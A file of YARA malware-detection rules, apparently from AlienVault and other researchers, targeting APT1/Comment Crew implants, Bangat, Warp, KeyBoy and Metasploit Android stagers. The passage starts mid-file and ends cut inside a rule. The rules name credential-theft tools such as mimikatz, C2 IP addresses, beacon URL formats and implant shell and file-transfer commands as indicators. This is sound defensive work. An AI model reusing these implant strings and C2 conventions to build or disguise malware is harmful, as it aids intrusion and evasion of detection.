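}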
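rule SWORD_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>" wide ascii   // protocol banner
        $s2 = "sleep:" wide ascii   // command prefixes; generic alone
        $s3 = "down:" wide ascii
        $s4 = "*========== Bye Bye ! ==========*" wide ascii

    condition:
        all of them
}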
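rule ccrewDownloader3
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // Obfuscated/garbage identifiers embedded in the downloader
        $a = "ejlcmbv" wide ascii
        $b = "bhxjuisv" wide ascii
        $c = "yqzgrh" wide ascii
        $d = "uqusofrp" wide ascii
        $e = "Ljpltmivvdcbb" wide ascii
        $f = "frfogjviirr" wide ascii
        $g = "ximhttoskop" wide ascii

    condition:
        4 of them
}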
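rule GEN_CCREW1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $a = "W!r@o#n$g" wide ascii
        // Match is case-sensitive, so the unusual capitalisation "KerNel32" is the indicator,
        // not the ordinary kernel32.dll import name
        $b = "KerNel32.dll" wide ascii

    condition:
        any of them
}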
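rule KURTON_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 5.1)" wide ascii   // note "MSIE8.0" without a space
        $s2 = "!(*@)(!@PORT!(*@)(!@URL" wide ascii
        $s3 = "MyTmpFile.Dat" wide ascii
        $s4 = "SvcHost.DLL.log" wide ascii   // also used by APT1_Revird_svc in this file

    condition:
        all of them
}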
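rule COMBOS_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // Malformed User-Agent strings (missing "/" after Mozilla)
        $s1 = "Mozilla4.0 (compatible; MSIE 7.0; Win32)" wide ascii
        $s2 = "Mozilla5.1 (compatible; MSIE 8.0; Win32)" wide ascii
        $s3 = "Delay" wide ascii
        $s4 = "Getfile" wide ascii
        $s5 = "Putfile" wide ascii
        $s6 = "---[ Virtual Shell]---" wide ascii
        $s7 = "Not Comming From Our Server %s." wide ascii

    condition:
        all of them
}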
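rule APT1_aspnetreport
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // Both the URI and the parameter format string are mandatory
        $url = "aspnet_client/report.asp" wide ascii
        $param = "name=%s&Gender=%c&Random=%04d&SessionKey=%s" wide ascii
        // Payload file names; many are legitimate Windows/Adobe names and only count
        // once $url and $param have matched
        $pay1 = "rusinfo.exe" wide ascii
        $pay2 = "cmd.exe" wide ascii
        $pay3 = "AdobeUpdater.exe" wide ascii
        $pay4 = "buildout.exe" wide ascii
        $pay5 = "DefWatch.exe" wide ascii
        $pay6 = "d.exe" wide ascii
        $pay7 = "em.exe" wide ascii
        $pay8 = "IMSCMig.exe" wide ascii
        $pay9 = "localfile.exe" wide ascii
        $pay10 = "md.exe" wide ascii
        $pay11 = "mdm.exe" wide ascii
        $pay12 = "mimikatz.exe" wide ascii
        $pay13 = "msdev.exe" wide ascii
        $pay14 = "ntoskrnl.exe" wide ascii
        $pay15 = "p.exe" wide ascii
        $pay16 = "otepad.exe" wide ascii
        $pay17 = "reg.exe" wide ascii
        $pay18 = "regsvr.exe" wide ascii
        $pay19 = "runinfo.exe" wide ascii
        $pay20 = "AdobeUpdate.exe" wide ascii
        $pay21 = "inetinfo.exe" wide ascii
        $pay22 = "svehost.exe" wide ascii
        $pay23 = "update.exe" wide ascii
        $pay24 = "NTLMHash.exe" wide ascii
        $pay25 = "wpnpinst.exe" wide ascii
        $pay26 = "WSDbg.exe" wide ascii
        $pay27 = "xcmd.exe" wide ascii
        $pay28 = "adobeup.exe" wide ascii
        $pay29 = "0830.bin" wide ascii
        $pay30 = "1001.bin" wide ascii
        $pay31 = "a.bin" wide ascii
        $pay32 = "ISUN32.EXE" wide ascii
        $pay33 = "AcroRD32.EXE" wide ascii
        $pay34 = "INETINFO.EXE" wide ascii

    condition:
        $url and $param and 1 of ($pay*)
}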
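rule LONGRUN_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0)" wide ascii   // token order differs from real IE UAs
        $s2 = "%s\\%c%c%c%c%c%c%c" wide ascii   // 7-character random file name format
        $s3 = "wait:" wide ascii
        $s4 = "Dcryption Error! Invalid Character" wide ascii   // misspelling is part of the indicator

    condition:
        all of them
}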
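rule TrojanCookies_CCREW
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // Command / form-field tokens; each is generic, hence the 4-of-5 threshold
        $a = "sleep:" wide ascii
        $b = "content=" wide ascii
        $c = "reqpath=" wide ascii
        $d = "savepath=" wide ascii
        $e = "command=" wide ascii

    condition:
        4 of ($a,$b,$c,$d,$e)
}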
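rule TABMSGSQL_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "letusgohtppmmv2.0.0.1" wide ascii   // version/handshake token
        $s2 = "Mozilla/4.0 (compatible; )" wide ascii   // empty-compatible UA
        $s3 = "filestoc" wide ascii   // file transfer commands (server->client / client->server)
        $s4 = "filectos" wide ascii
        $s5 = "reshell" wide ascii

    condition:
        all of them
}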
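rule APT1_WEBC2_RAVE
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $1 = "iniet.exe" wide ascii   // look-alike of inetinfo/iexplore style names
        $2 = "cmd.exe" wide ascii     // generic; counts toward the threshold only
        $3 = "SYSTEM\\CurrentControlSet\\Services\\DEVFS" wide ascii   // service key
        $4 = "Device File System" wide ascii   // service display name

    condition:
        3 of them
}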
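rule MACROMAIL_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "svcMsn.dll" wide ascii
        $s2 = "RundllInstall" wide ascii   // export used for rundll32-based install
        $s3 = "Config service %s ok." wide ascii
        $s4 = "svchost.exe" wide ascii     // generic; required together with the others

    condition:
        all of them
}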
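rule APT1_WARP
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // Terse log fragments; individually very generic
        $err1 = "exception..." wide ascii
        $err2 = "failed..." wide ascii
        $err3 = "opened..." wide ascii
        $exe1 = "cmd.exe" wide ascii
        $exe2 = "ISUN32.EXE" wide ascii   // the only distinctive string; upper-case spelling matters

    condition:
        2 of ($err*) and all of ($exe*)
}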
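rule thequickbrow_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // Custom pangram-like alphabet string (not the standard "the quick brown fox")
        $s1 = "thequickbrownfxjmpsvalzydg" wide ascii

    condition:
        all of them
}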
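rule BOUNCER_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // Pair 1: embedded key material + resource name format
        $s1 = "*Qd9kdgba33*%Wkda0Qd3kvn$*&><(*&%$E#%$#1234asdgKNAg@!gy565dtfbasdg" wide ascii
        $s2 = "IDR_DATA%d" wide ascii
        // Pair 2: key and usage message of the encrypt/decrypt helper
        $s3 = "asdfqwe123cxz" wide ascii
        $s4 = "Mode must be 0(encrypt) or 1(decrypt)." wide ascii

    condition:
        ($s1 and $s2) or ($s3 and $s4)
}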
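rule metaxcd
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // Non-standard HTML meta attribute used to carry commands in web pages
        $a = "<meta xcd=" wide ascii

    condition:
        $a
}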
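rule APT1_WEBC2_AUSOV
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $1 = "ntshrui.dll" wide ascii   // legitimate DLL name; known DLL-search-order target
        $2 = "%SystemRoot%\\System32\\" wide ascii
        $3 = "<!--DOCHTML" wide ascii   // malformed HTML comment used as a marker
        $4 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" wide ascii
        $5 = "Ausov" wide ascii

    condition:
        4 of them
}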
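rule CCREWBACK1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // Form-field names (need 4 of 5)
        $a = "postvalue" wide ascii
        $b = "postdata" wide ascii
        $c = "postfile" wide ascii
        $d = "hostname" wide ascii
        $e = "clientkey" wide ascii
        // Error message; sufficient alone
        $f = "start Cmd Failure!" wide ascii
        // Command prefixes (need 3 of 4)
        $g = "sleep:" wide ascii
        $h = "downloadcopy:" wide ascii
        $i = "download:" wide ascii
        $j = "geturl:" wide ascii
        // Hard-coded IP literal; sufficient alone, so expect hits on anything that merely cites it
        $k = "1.234.1.68" wide ascii

    condition:
        4 of ($a,$b,$c,$d,$e) or $f or 3 of ($g,$h,$i,$j) or $k
}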
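rule DAIRY_APT1
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "Mozilla/4.0 (compatible; MSIE 7.0;)" wide ascii   // truncated UA with trailing ";)"
        $s2 = "KilFail" wide ascii   // process-kill result strings
        $s3 = "KilSucc" wide ascii
        $s4 = "pkkill" wide ascii    // process-kill / process-list commands
        $s5 = "pklist" wide ascii

    condition:
        all of them
}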
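rule APT1_TARSIP_MOON
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        // Build-path / vendor strings
        $s1 = "\\XiaoME\\SunCloud-Code\\moon" wide ascii
        $s2 = "URL download success!" wide ascii
        $s3 = "Kugoosoft" wide ascii
        // Status messages
        $msg1 = "Modify file failed!! So strange!" wide ascii
        $msg2 = "Create cmd process failed!" wide ascii
        $msg3 = "The command has not been implemented!" wide ascii
        $msg4 = "Runas success!" wide ascii
        // Beacon endpoints
        $onec1 = "onec.php" wide ascii
        $onec2 = "/bin/onec" wide ascii

    condition:
        // One from each group
        1 of ($s*) and 1 of ($msg*) and 1 of ($onec*)
}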
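rule APT1_RARSilent_EXE_PDF
{
    // Restored the missing closing brace so the rule compiles.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $winrar1 = "WINRAR.SFX" wide ascii   // self-extracting archive stub; legitimate on its own
        $str2 = "Steup=" wide ascii         // misspelled SFX "Setup=" directive is the actual indicator

    condition:
        all of them
}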
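rule MINIASP_APT1
{
    // Restored the missing closing brace so the rule compiles.
    // Narrower companion of ccrewMiniasp/MiniASP in this file: all five strings are required.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "miniasp" wide ascii
        $s2 = "wakeup=" wide ascii
        $s3 = "download ok!" wide ascii
        $s4 = "command is null!" wide ascii
        $s5 = "device_input.asp?device_t=" wide ascii   // contains ccrewMiniasp's "device_t="

    condition:
        all of them
}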
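rule APT1_WEBC2_YAHOO
{
    // $http1/$http2 are generic HTTP tokens; the distinctive part is the
    // "IPHONE8.5(host:%s,ip:%s)" format string, and all three must be present.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $http1 = "HTTP/1.0" wide ascii
        $http2 = "Content-Type:" wide ascii
        $uagent = "IPHONE8.5(host:%s,ip:%s)" wide ascii

    condition:
        all of them
}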
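rule MiniASP
{
    // Either indicator alone is sufficient ("any of them").
    // $KEY is 36 printable bytes: the ASCII text "q0nc9w8edaoiuk2mzrfy3xt1p5ls67g4bvhj",
    // i.e. a permutation of a-z0-9 (each exactly once) - consistent with a custom
    // base-36 style alphabet, but what the sample does with it is not shown here.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $KEY = { 71 30 6E 63 39 77 38 65 64 61 6F 69 75 6B 32 6D 7A 72 66 79 33 78 74 31 70 35 6C 73 36 37 67 34 62 76 68 6A }
        $PDB = "MiniAsp.pdb" nocase wide ascii

    condition:
        any of them
}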
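rule APT1_WEBC2_QBP
{
    // 4 of 5: since $3-$5 are ordinary API/DLL names found in many benign binaries,
    // the threshold guarantees at least one of the specific markers ($1 or $2) is present.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $1 = "2010QBP" wide ascii
        $2 = "adobe_sl.exe" wide ascii
        $3 = "URLDownloadToCacheFile" wide ascii
        $4 = "dnsapi.dll" wide ascii
        $5 = "urlmon.dll" wide ascii

    condition:
        4 of them
}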
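rule EclipseSunCloudRAT
{
    // Any single string triggers. $d ("XiaoME") and $e ("SunCloud-Code") are also
    // path components of APT1_TARSIP_MOON's $s1, so both rules may fire on one file.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $a = "Eclipse_A" wide ascii
        $b = "\\PJTS\\" wide ascii
        $c = "Eclipse_Client_B.pdb" wide ascii
        $d = "XiaoME" wide ascii
        $e = "SunCloud-Code" wide ascii
        $f = "/uc_server/data/forum.asp" wide ascii

    condition:
        any of them
}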
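rule APT1_MAPIGET
{
    // All five required. "Subject:" and "Recv Time:" are generic mail-related text;
    // the all-of requirement keeps the rule specific.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "%s\\Attachment.dat" wide ascii
        $s2 = "MyOutlook" wide ascii
        $s3 = "mail.txt" wide ascii
        $s4 = "Recv Time:" wide ascii
        $s5 = "Subject:" wide ascii

    condition:
        all of them
}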
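rule ccrewSSLBack3
{
    // Single-string rule: the 8-byte marker "SLYHKAAY" (ASCII or UTF-16LE) is sufficient.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $a = "SLYHKAAY" wide ascii

    condition:
        any of them
}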
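rule APT1_dbg_mess
{
    // Needs 4 of the operator-facing debug messages ($dbg*) and 1 payload name ($pay*).
    // Several $pay entries are ordinary Windows names (cmd.exe, reg.exe, ntoskrnl.exe,
    // inetinfo.exe), so the $dbg threshold is what carries the rule's specificity.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $dbg1 = "Down file ok!" wide ascii
        $dbg2 = "Send file ok!" wide ascii
        $dbg3 = "Command Error!" wide ascii
        $dbg4 = "Pls choose target first!" wide ascii
        $dbg5 = "Alert!" wide ascii
        $dbg6 = "Pls press enter to make sure!" wide ascii
        $dbg7 = "Are you sure to " wide ascii
        $pay1 = "rusinfo.exe" wide ascii
        $pay2 = "cmd.exe" wide ascii
        $pay3 = "AdobeUpdater.exe" wide ascii
        $pay4 = "buildout.exe" wide ascii
        $pay5 = "DefWatch.exe" wide ascii
        $pay6 = "d.exe" wide ascii
        $pay7 = "em.exe" wide ascii
        $pay8 = "IMSCMig.exe" wide ascii
        $pay9 = "localfile.exe" wide ascii
        $pay10 = "md.exe" wide ascii
        $pay11 = "mdm.exe" wide ascii
        $pay12 = "mimikatz.exe" wide ascii
        $pay13 = "msdev.exe" wide ascii
        $pay14 = "ntoskrnl.exe" wide ascii
        $pay15 = "p.exe" wide ascii
        $pay16 = "otepad.exe" wide ascii
        $pay17 = "reg.exe" wide ascii
        $pay18 = "regsvr.exe" wide ascii
        $pay19 = "runinfo.exe" wide ascii
        $pay20 = "AdobeUpdate.exe" wide ascii
        $pay21 = "inetinfo.exe" wide ascii
        $pay22 = "svehost.exe" wide ascii
        $pay23 = "update.exe" wide ascii
        $pay24 = "NTLMHash.exe" wide ascii
        $pay25 = "wpnpinst.exe" wide ascii
        $pay26 = "WSDbg.exe" wide ascii
        $pay27 = "xcmd.exe" wide ascii
        $pay28 = "adobeup.exe" wide ascii
        $pay29 = "0830.bin" wide ascii
        $pay30 = "1001.bin" wide ascii
        $pay31 = "a.bin" wide ascii
        $pay32 = "ISUN32.EXE" wide ascii
        $pay33 = "AcroRD32.EXE" wide ascii
        $pay34 = "INETINFO.EXE" wide ascii

    condition:
        4 of ($dbg*) and 1 of ($pay*)
}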
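rule NEWSREELS_APT1
{
    // All eight required. $s5-$s8 are short common words ("wait", "active", "hello");
    // they only contribute alongside the User-Agent and the name=/userid= format string.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)" wide ascii
        $s2 = "name=%s&userid=%04d&other=%c%s" wide ascii
        $s3 = "download ok!" wide ascii
        $s4 = "command is null!" wide ascii
        $s5 = "noclient" wide ascii
        $s6 = "wait" wide ascii
        $s7 = "active" wide ascii
        $s8 = "hello" wide ascii

    condition:
        all of them
}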
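rule ccrewDownloader1
{
    // Single 16-byte binary pattern; its meaning inside the sample is not documented here.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $a = {DD B5 61 F0 20 47 20 57 D6 65 9C CB 31 1B 65 42}

    condition:
        any of them
}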
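rule APT1_WEBC2_ADSPACE
{
    // Both strings required: the HTML comment marker the implant looks for in a page,
    // and the ERSVC.DLL file name.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $1 = "<!---HEADER ADSPACE style=" wide ascii
        $2 = "ERSVC.DLL" wide ascii

    condition:
        all of them
}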
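rule APT1_GDOCUPLOAD
{
    // 3 of 4 strings. $str1 ("GALX") is a Google login form field name and $str2 a
    // spoofed Flash User-Agent; the threshold means one of the two may be absent.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $str1 = "name=\"GALX\"" wide ascii
        $str2 = "User-Agent: Shockwave Flash" wide ascii
        $str3 = "add cookie failed..." wide ascii
        $str4 = ",speed=%f" wide ascii

    condition:
        3 of them
}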
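rule APT1_WEBC2_BOLID
{
    // NOTE(review): YARA text strings are literal, so $http matches only the exact text
    // "http://[c2_location]/[page].html" including the square brackets. That looks like a
    // report placeholder carried into the rule rather than a pattern; a binary holding a
    // real URL will not satisfy it, and with "all of them" the rule then never fires.
    // Confirm against the source material before relying on this rule.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $vm = "VMProtect" wide ascii
        $http = "http://[c2_location]/[page].html" wide ascii

    condition:
        all of them
}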
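rule STARSYPOUND_APT1
{
    // All four required. $s4 "*(SY)#" is a substring of $s1, so any file with $s1
    // also has $s4; the effective requirement is $s1, $s2 and $s3.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "*(SY)# cmd" wide ascii
        $s2 = "send = %d" wide ascii
        $s3 = "cmd.exe" wide ascii
        $s4 = "*(SY)#" wide ascii

    condition:
        all of them
}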
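rule DownloaderPossibleCCrew
{
    // All five required: three format strings, a status message and a fixed User-Agent.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $a = "%s?%.6u" wide ascii
        $b = "szFileUrl=%s" wide ascii
        $c = "status=%u" wide ascii
        $d = "down file success" wide ascii
        $e = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)" wide ascii

    condition:
        all of them
}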
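rule APT1_WEBC2_CLOVER
{
    // Needs 2 of the 5 message strings plus one of the two User-Agents.
    // $msg4/$msg5 read like compression-library diagnostics and may occur in benign
    // software; the User-Agent requirement is what narrows the match.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $msg1 = "BUILD ERROR!" wide ascii
        $msg2 = "SUCCESS!" wide ascii
        $msg3 = "wild scan" wide ascii
        $msg4 = "Code too clever" wide ascii
        $msg5 = "insufficient lookahead" wide ascii
        $ua1 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; SV1)" wide ascii
        $ua2 = "Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.0.12) Firefox/1.5.0.12" wide ascii

    condition:
        2 of ($msg*) and 1 of ($ua*)
}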
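rule ccrewSSLBack1
{
    // Either string alone triggers. $b is a bare IPv4 address in text form; such a
    // string can occur in unrelated files (logs, configs), so a hit on $b alone
    // deserves a second look before being treated as a detection.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $a = "!@#%$^#@!" wide ascii
        $b = "64.91.80.6" wide ascii

    condition:
        any of them
}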
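rule GOGGLES_APT1
{
    // Two independent paths: all four status/library strings, or the PDB name alone.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "Kill process success!" wide ascii
        $s2 = "Kill process failed!" wide ascii
        $s3 = "Sleep success!" wide ascii
        $s4 = "based on gloox" wide ascii
        $pdb = "glooxtest.pdb" wide ascii

    condition:
        all of ($s*) or $pdb
}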
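rule Elise
{
    // Single PDB file-name indicator (ASCII or UTF-16LE).
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $a = "SetElise.pdb" wide ascii

    condition:
        $a
}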
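rule SEASALT_APT1
{
    // All five required; the "KSMM" suffix on the User-Agent is the distinctive token.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM" wide ascii
        $s2 = "upfileok" wide ascii
        $s3 = "download ok!" wide ascii
        $s4 = "upfileer" wide ascii
        $s5 = "fxftest" wide ascii

    condition:
        all of them
}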
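rule APT1_LIGHTBOLT
{
    // 2 of 4. "bits.exe", "Browser.exe" and "Protect!" are not unusual on their own,
    // so review hits that lack "PDFBROW".
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $str1 = "bits.exe" wide ascii
        $str2 = "PDFBROW" wide ascii
        $str3 = "Browser.exe" wide ascii
        $str4 = "Protect!" wide ascii

    condition:
        2 of them
}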
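rule APT1_GETMAIL
{
    // Two alternative string sets. "doCompress" is declared in both ($stra3 and $strb3);
    // that is legal but redundant, and the common member means set B effectively
    // only adds "getmail.dll" and the 4-byte "love" on top of it.
    meta:
        author = "AlienVault Labs"
        info = "CommentCrew-threat-apt1"

    strings:
        $stra1 = "pls give the FULL path" wide ascii
        $stra2 = "mapi32.dll" wide ascii
        $stra3 = "doCompress" wide ascii
        $strb1 = "getmail.dll" wide ascii
        $strb2 = "doCompress" wide ascii
        $strb3 = "love" wide ascii

    condition:
        all of ($stra*) or all of ($strb*)
}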
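rule BangatStrings
{
    // $lib1-$lib5 are Win32 API names with the first letter shifted up by one
    // (CreatePipe, GetSystemDirectoryA, ReleaseMutex, CloseWindowStation,
    // ControlService); matching the altered forms targets the sample's obfuscated
    // import names. Either all five of those, or the temp-file name, or the "~_MC_3~"
    // marker alone is sufficient.
    meta:
        description = "Bangat Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-07-10"

    strings:
        $lib1 = "DreatePipe"
        $lib2 = "HetSystemDirectoryA"
        $lib3 = "SeleaseMutex"
        $lib4 = "DloseWindowStation"
        $lib5 = "DontrolService"
        $file = "~hhC2F~.tmp"
        $mc = "~_MC_3~"

    condition:
        all of ($lib*) or $file or $mc
}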
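rule BangatCode
{
    // Single anonymous hex pattern with wildcard nibbles/bytes; the author's comment
    // below gives the intended instruction sequence.
    meta:
        description = "Bangat code features"
        author = "Seth Hardy"
        last_modified = "2014-07-10"

    strings:
        // dec [ebp + procname], push eax, push edx, call get procaddress
        $ = { FE 4D ?? 8D 4? ?? 50 5? FF }

    condition:
        any of them
}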
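rule CookiesStrings
{
    // Two independent string families: $zip* (a file name immediately followed by a
    // "PK" zip signature, and SFX-style "Setup=" / "Silent=1" script lines with CRLF)
    // and $exe* (the dropped executable's log messages). Two hits within either family
    // are enough. Only $exe10 is also checked in UTF-16LE; the rest are ASCII only.
    meta:
        description = "Cookies Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-20"

    strings:
        $zip1 = "ntdll.exePK"
        $zip2 = "AcroRd32.exePK"
        $zip3 = "Setup=ntdll.exe\x0d\x0aSilent=1\x0d\x0a"
        $zip4 = "Setup=%temp%\\AcroRd32.exe\x0d\x0a"
        $exe1 = "Leave GetCommand!"
        $exe2 = "perform exe success!"
        $exe3 = "perform exe failure!"
        $exe4 = "Entry SendCommandReq!"
        $exe5 = "Reqfile not exist!"
        $exe6 = "LeaveDealUpfile!"
        $exe7 = "Entry PostData!"
        $exe8 = "Leave PostFile!"
        $exe9 = "Entry PostFile!"
        $exe10 = "\\unknow.zip" wide ascii
        $exe11 = "the url no respon!"

    condition:
        (2 of ($zip*)) or (2 of ($exe*))
}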
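rule GlassesStrings : Glasses Family
{
    // All three anonymous ASCII strings required: a 26-letter alphabet-like string
    // (every letter a-z once - presumably a substitution table, unverified), a
    // User-Agent with two %s slots, and an HTML anchor fragment.
    meta:
        description = "Strings used by Glasses"
        author = "Seth Hardy"
        last_modified = "2014-07-22"

    strings:
        $ = "thequickbrownfxjmpsvalzydg"
        $ = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)"
        $ = "\" target=\"NewRef\"></a>"

    condition:
        all of them
}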
      
// Tagged "memory": per its description this rule is meant for process-memory scans.
// Requires the PDB path, both http format strings, and at least one status message;
// every string is "fullword", so it must not be bordered by alphanumeric characters.
// Shares "command is null!" with MINIASP_APT1 and NEWSREELS_APT1 above.
rule MiniAsp3_mem : memory {
     meta: author = "chort (@chort0)"
     description = "Detect MiniASP3 in memory"
     strings:
       $pdb = "MiniAsp3\\Release\\MiniAsp.pdb" fullword
       $httpAbout = "http://%s/about.htm" fullword
       $httpResult = "http://%s/result_%s.htm" fullword
       $msgInetFail = "open internet failed" fullword
       $msgRunErr = "run error!" fullword
       $msgRunOk = "run ok!" fullword
       $msgTimeOutM0 = "time out,change to mode 0" fullword
       $msgCmdNull = "command is null!" fullword
   condition:
     ($pdb and (all of ($http*)) and any of ($msg*))
     }
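rule WarpCode : Warp Family
{
    // Single 16-byte code pattern; the author's comment describes it as a
    // character-replacement routine.
    meta:
        description = "Warp code features"
        author = "Seth Hardy"
        last_modified = "2014-07-10"

    strings:
        // character replacement
        $ = { 80 38 2B 75 03 C6 00 2D 80 38 2F 75 03 C6 00 5F }

    condition:
        any of them
}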
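rule WarpStrings : Warp Family
{
    // Any single string triggers. The second string is only four bytes ("wyle") with no
    // fullword modifier, so it will also match inside unrelated words; expect some
    // false positives on that string and check which string hit when triaging.
    meta:
        description = "Warp Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-07-10"

    strings:
        $ = "/2011/n325423.shtml?"
        $ = "wyle"
        $ = "\\~ISUN32.EXE"

    condition:
        any of them
}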
// https://otx.alienvault.com/pulse/58c49c14a4d4fe2b56f7222e
// https://otx.alienvault.com/pulse/5977d8e5f7cda5036057bdb9
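rule android_metasploit : android
{
    // All four strings required. $c/$d are Dalvik class descriptors
    // (Lcom/metasploit/stage/...;) of the Metasploit Android stager classes; the
    // leading "*" and "(" bytes on $a/$b are kept as written and presumably come from
    // the bytes preceding those names in the sample - unverified.
    meta:
        author = "https://twitter.com/plutec_net"
        description = "This rule detects apps made with metasploit framework"
        sample = "cb9a217032620c63b85a58dde0f9493f69e4bda1e12b180047407c15ee491b41"

    strings:
        $a = "*Lcom/metasploit/stage/PayloadTrustManager;"
        $b = "(com.metasploit.stage.PayloadTrustManager"
        $c = "Lcom/metasploit/stage/Payload$1;"
        $d = "Lcom/metasploit/stage/Payload;"

    condition:
        all of them
}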
   		   
// https://otx.alienvault.com/pulse/582a7cbbc9eef92d31ad7c90
// https://otx.alienvault.com/pulse/5979fb8ff7cda54d2f57bdb7
// https://otx.alienvault.com/pulse/584005cc54c08e6719172eb7
// https://otx.alienvault.com/pulse/54f51dd813432a7ab0187afa
// https://otx.alienvault.com/pulse/57ba544df33d540135015351
// https://otx.alienvault.com/pulse/582e056ee26e8e7419ad5a4b
// Matches the printf-style format strings KeyBoy uses to build its system-information
// report. Gate: "MZ" at offset 0, "PE\0\0" at e_lfanew (read little-endian from offset
// 0x3C), file under 200 KB, then at least 7 of the 14 format strings in ASCII or UTF-16LE.
// "ResgisterGroup" is spelled as in the sample; do not correct it.
rule keyboy_systeminfo
      {
          meta:
              author = "Matt Brooks, @cmatthewbrooks"
              desc = "Matches the system information format before sending to C2"
              date = "2016-08-28"
              md5 = "495adb1b9777002ecfe22aaf52fcee93"

          strings:
              //These strings are ASCII pre-2015 and UNICODE in 2016
              $s1 = "SystemVersion:    %s" ascii wide
              $s2 = "Product  ID:      %s" ascii wide
              $s3 = "InstallPath:      %s" ascii wide
              $s4 = "InstallTime:      %d-%d-%d, %02d:%02d:%02d" ascii wide
              $s5 = "ResgisterGroup:   %s" ascii wide
              $s6 = "RegisterUser:     %s" ascii wide
              $s7 = "ComputerName:     %s" ascii wide
              $s8 = "WindowsDirectory: %s" ascii wide
              $s9 = "System Directory: %s" ascii wide
              $s10 = "Number of Processors:       %d" ascii wide
              $s11 = "CPU[%d]:  %s: %sMHz" ascii wide
              $s12 = "RAM:         %dMB Total, %dMB Free." ascii wide
              $s13 = "DisplayMode: %d x %d, %dHz, %dbit" ascii wide
              $s14 = "Uptime:      %d Days %02u:%02u:%02u" ascii wide

          condition:
              //MZ header
